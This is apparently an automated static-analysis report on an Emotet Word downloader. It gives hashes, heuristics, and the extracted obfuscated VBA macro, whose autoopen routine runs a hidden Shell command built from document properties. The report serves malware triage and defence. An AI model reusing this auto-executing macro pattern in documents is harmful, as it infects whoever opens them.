Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 5dc91a43bfcf5f4b…

MALICIOUS

Office (OLE)

57.5 KB Created: 2017-09-27 15:07:00 Authoring application: Microsoft Office Word First seen: 2017-10-10
MD5: 329ed1530683d42701123b33e93967f0 SHA-1: f9f0e95930175184b047905f4c7490c6089d7ee3 SHA-256: 5dc91a43bfcf5f4b4c2a759220e9eacec671bc275572b6feeca274d9c4836829
172 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample was identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6344335-3', strongly suggesting the Emotet family. Static analysis revealed VBA macros, including an 'autoopen' subroutine that calls a function 'NaScxRR'. This function constructs a string and then uses VBA's Shell command to execute it. The constructed string is too obfuscated to fully reconstruct, but the presence of the Shell call and the Emotet detection indicate a downloader functionality.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6344335-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    bkUupez = "usGsXVT" + "tXKNxPUn" + "HNdLvHHBU" + "RTZAawtL" + dChhrVcm = "HHPFNvaVYWW" + "akXzcbZdY" + "zdCHhAT" + "hHAtsRyr" + "AzpXthkP"
VBA.Shell$ "" + GyCFrFbA + PstkTcAMFwr + FhMErgwp + xfuZKaWcn + FFTnDkLdAd + nUGFprGn + Ubbseuh + GyCFrFbA + PstkTcAMFwr + FhMErgwp + xfuZKaWcn + FFTnDkLdAd + nUGFprGn + whKwUFbM, 0
TMdxFNhdGtS = "CygzNSMTn" + "NnNrgWeUGPB" + "zMmCBvAywv" + "VCpRYLMc" + sktwHtMFbKU = "CCXZvmagX" + "vnasfea" + "gWsfDueXhR" + "CzDPtbCDa" + yBABxUe = "XPdkRnDcSc" + "gzrbxMYSk" + "pruEGwMLbzM" + "ewGNztMNpSP" + "BXEaMnP"
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
Sub autoopen()
NaScxRR
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1562 bytes
SHA-256: 9dcc687078dfc31dd3ddf66ca65b852f8a704a35277c69d0292732e7ed0ae5d5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
43 of 69 identifiers look randomly generated (e.g. 'TMdxFNhdGtS') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Function NaScxRR()
VSeEmYcHe = "nNtGSEW" + "hagGfPBw" + "HGcrDFs" + "ncXBskCXwvU" + seVkvaHHgB = "cMrCUGbyEbv" + "fpftwXHPbDM" + "fgEPGVuXYau" + "KnEStCpY" + "ruCtmCRTVC"
Ubbseuh = "" + GyCFrFbA + PstkTcAMFwr + FhMErgwp + xfuZKaWcn + FFTnDkLdAd + nUGFprGn + ActiveDocument.CustomDocumentProperties("gGvvXrxe") + GyCFrFbA + PstkTcAMFwr + FhMErgwp + xfuZKaWcn + FFTnDkLdAd + nUGFprGn + ActiveDocument.CustomDocumentProperties("vnZLaRZ") + GyCFrFbA + PstkTcAMFwr + FhMErgwp + xfuZKaWcn + FFTnDkLdAd + nUGFprGn + ActiveDocument.BuiltInDocumentProperties("Comments") + GyCFrFbA + PstkTcAMFwr + FhMErgwp + xfuZKaWcn + FFTnDkLdAd + nUGFprGn + DkusswZSfg
bkUupez = "usGsXVT" + "tXKNxPUn" + "HNdLvHHBU" + "RTZAawtL" + dChhrVcm = "HHPFNvaVYWW" + "akXzcbZdY" + "zdCHhAT" + "hHAtsRyr" + "AzpXthkP"
VBA.Shell$ "" + GyCFrFbA + PstkTcAMFwr + FhMErgwp + xfuZKaWcn + FFTnDkLdAd + nUGFprGn + Ubbseuh + GyCFrFbA + PstkTcAMFwr + FhMErgwp + xfuZKaWcn + FFTnDkLdAd + nUGFprGn + whKwUFbM, 0
TMdxFNhdGtS = "CygzNSMTn" + "NnNrgWeUGPB" + "zMmCBvAywv" + "VCpRYLMc" + sktwHtMFbKU = "CCXZvmagX" + "vnasfea" + "gWsfDueXhR" + "CzDPtbCDa" + yBABxUe = "XPdkRnDcSc" + "gzrbxMYSk" + "pruEGwMLbzM" + "ewGNztMNpSP" + "BXEaMnP"
End Function
Sub autoopen()
NaScxRR
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.